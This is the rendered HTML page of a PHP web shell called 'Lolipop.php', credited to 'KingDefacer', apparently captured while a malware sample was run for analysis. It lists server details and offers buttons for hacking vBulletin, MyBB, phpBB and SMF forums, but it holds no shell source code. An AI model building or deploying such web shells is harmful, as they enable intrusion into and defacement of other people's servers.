?><p align="right"></p><body bgcolor="#FFFFFF"> 
<head> 
<style> 
body { font-size: 12px; 

           font-family: arial, helvetica; 

            scrollbar-width: 5; 

            scrollbar-height: 5; 

            scrollbar-face-color: black; 

            scrollbar-shadow-color: silver; 

            scrollbar-highlight-color: silver; 

            scrollbar-3dlight-color:silver; 

            scrollbar-darkshadow-color: silver; 

            scrollbar-track-color: black; 

            scrollbar-arrow-color: silver; 

    } 
</style> 

<title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> 
<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> 
    <tr> 
        <td><font color='#000000'> 


          <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> 

    </tr> 
    <tr> 
        <td  style='border: 1px solid #333333'> 
        <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.3 </u><br>Uname -a: <u>Linux cj-pc 4.15.0-76-generic #86~16.04.1-Ubuntu SMP Mon Jan 20 11:02:50 UTC 2020 x86_64</u><br>Path: <u>/home/cj/MALMAX/malmax-shipped/malmax-shipped/samples/obfuscated/4/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=green>None</font></u><br>Page: <u>main.php</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td>  
    </tr> 
</table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font>    </tr> 
<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value='  phpBB HACK.  '><input type=submit name=smf value='  SMF HACK.  '></form></center> 


<br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> 
<tr> 
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> 

  <p><strong>Lolipop.php</strong></p> 
  <p><strong>Edited By KingDefacer</strong></p> 
<p><strong></strong><br> 
</p></td> 
</tr></table> 
